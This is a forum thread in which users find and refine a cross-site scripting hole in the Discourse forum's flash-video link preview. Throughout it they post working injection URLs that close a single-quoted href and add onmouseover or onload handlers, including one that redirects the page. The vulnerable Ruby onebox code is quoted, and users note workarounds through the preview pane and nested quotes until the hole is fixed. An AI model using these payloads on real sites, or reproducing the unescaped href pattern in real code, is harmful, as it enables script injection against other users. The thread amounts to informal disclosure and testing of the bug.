HTML tag abuse thread
-
http://google.com/test'onmouseover=alert('XSS!');//.swf
http://google.com/test'onload=alert('XSS!');//.swf
[Edit - PJH] Rebaking to test a9342db
-
I'll be damned, the first one works.
-
http://google.com/test'onmouseover=alert('XSS!');//.swf
http://google.com/test'onload=alert('XSS!');//.swf
Nice![Edit - PJH] Rebaking
-
Oh crap!
-
http://google.com/test'onmouseover=alert('XSS!');//.swf
http://google.com/test'onload=alert('XSS!');//.swf@PJH, we have a winner!
[Edit - PJH] Rebaking
-
-
-
http://google.com/test'onmouseover=document.location.href='http://google.com';//.swf
[Edit - PJH] Rebaking
-
This is a terrible exploit.
-
That's just evil.
-
<code class="fa-spin">foobar
-
-
Feature request: Logo change for the forums. Should read:
The Daily WTF Forums
We break shit
Filed under: Add Unicode abuse where appropriate, I'm too lazy
-
-
-
My link and its title isn't quite right
I don't know how this could be exploited, but it's obviously wrong:
<a href="http://thedailywtf.com" title="@breaks shit">My link isn't quite right</a>
-
http://google.com/test'onmouseover=alert('XSS!');//.swf
Seriously though... that's full of fail, I can't believe it took that long for someone to figure that one out!
Interestingly it fails to work on links that would one-box...
http://en.wikipedia.org/wiki/Noah_Lomax'onmouseover='alert('soyoumanagedtofixonevarietybutnotall,congratsdicsourse');//.swf[Edit - PJH] Rebaking
-
module Onebox module Engine class FlashVideoOnebox include Engine matches_regexp /^https?:\/\/.*\.(swf|flv)$/ def to_html if SiteSetting.enable_flash_video_onebox "<object width='100%' height='100%'><param name='#{@url}' value='#{@url}'><embed src='#{@url}' width='100%' height='100%'></embed></object>" else "<a href='#{@url}'>#{@url}</a>" end end end end end
Well, that is full of fail.
-
Yeah... they double quote all their links everywhere and then someone gets too lazy to escape that one module and leaves escapable single quotes in the href... witch hunt on the person that checked that file in.
-
Note to Dicsourse editors - grep for href=' in your project files and fix them all before someone else greps it.
-
I wonder...
Awesome, this one spins in my profile too.
-
-
I wonder...
Can you make it big, spinning and have it respond to mouseover?
-
Glad I could be of service.
-
http://google.com/test'class='fa-spin'onmouseover=this.classList.add('fa-5x')//.swf
Come on, mouse it over.
[Edit - PJH] Rebaking
-
This post is deleted!
-
I can't, mobile!
Edit holy shit this topic is making my screen hot now
-
Macie took my idea and stole my badge T_T
-
Anybody have time to JavaScript uppercase the entire thread...page.... xss?
-
Unless Iâm missing something, it seems to have been fixed...
http://example.org/tes't'abc.swf
-
Anybody have time to JavaScript uppercase the entire thread...page.... xss?
It's tough to do anything too complex because the 2nd open parenthesis triggers it to cut off your script.
-
, it seems to have been fixed.
Nevermind - it's fixed once you post. The preview window is still jacked, but I guess who cares if you XSS yourself.
http://www.google.com/'onmouseover=alert('test');//.swf
(although if you reply all and then hover my script it may work in your preview window I guess)
-
Nevermind - it's fixed once you post. The preview window is still jacked, but I guess who cares if you XSS yourself.
http://www.google.com/'onmouseover=alert('test');//.swf
(although if you reply all and then hover my script it may work in your preview window I guess)
Yep - you can XSS bomb still if someone reply quotes and hovers the preview.
-
Son of a bitch, I just got to work and I was going to make a javascript file uploader for filenotfoundstorage.com =(
(Well, more accurately, just the file upload window prompt)
-
http://what.thedailywtf.com/t/html-tag-abuse-thread/1269/210?u=matches
This quoted post still works (for now)
[Edit]
@PJH
Quoting the quoted post ALSO pops the xss. Sexy.
(Click the down arrow and mouse over)
-
-
Maybe not, but you have letter soup and I was on mobile.
-
Nice!
I wonder...
lol - the xss to pop a javascript alert still works, but the fa-spin doesn't. What happens if I quote a quote...
-
Can you make it big, spinning and have it respond to mouseover?
Dah...?
Dah.
Quoting a quote preserves the issue, direct quoting doesn't
-
There may be some cache issue, but I canât get it to work even in the preview pane. I tried quoting someone but @PJH is rebaking posts faster than I can quote them.
-
but @PJH is rebaking posts faster than I can quote them.
he's one hell of a chef, that's for sure.--yeah, if you reload your page, or just got here, the preview pane XSS is fixed now too.
-
It still spins :D
-
I haven't seen any spinning on anything, even when the exploit was still unfixed. I am grumpy cat.
-
http://what.thedailywtf.com/t/html-tag-abuse-thread/1269/246?u=matches
Click the up arrow, then the down arrow
-
Click the up arrow, then the down arrow
I clicked as prescribed, no worky.
I've hovered every single thing in this topic, never got a spinner.
-
However, if you click spam the Up/Down arrow on Quotes, you can get this:
Sweet, huh?
-
You're a blind man. When you click the up arrow it will jump you to my quote with Kieth, then click the down arrow to expand Keith's quote of Macie jumble of letters which has a spinner.
Your browser may not support spins.
-
You're a blind man. When you click the up arrow it will jump you to my quote with Kieth, then click the down arrow to expand Keith's quote of Macie jumble of letters which has a spinner.
I did exactly what you described and none of it spins. Zero Spin.
My browser does support spins because the fa-spin topic spun it up hardcore. It's just not working for this particular spin for whatever reason.See screenshot above, which is what you wanted me to do, right? Ignore the part where I got agitated and click spammed the up/down buttons to jack up the quote nesting.
-
My browser does support spins because the fa-spin topic spun it up hardcore. It's just not working for this particular spin for whatever reason.
Which browser are you using, and have you tried a different one?
-
Very interesting, because it even lists it in the CSS inspector:
.fa-spin {
-webkit-animation: spin 5s infinite linear;
-moz-animation: spin 2s infinite linear;
-o-animation: spin 2s infinite linear;
}and the -webkit one is checked as if it should work.
This is on chrome 33.Nevermind, it supports it fine.... screenshot coming.
I had to manually alter the css to make it work though.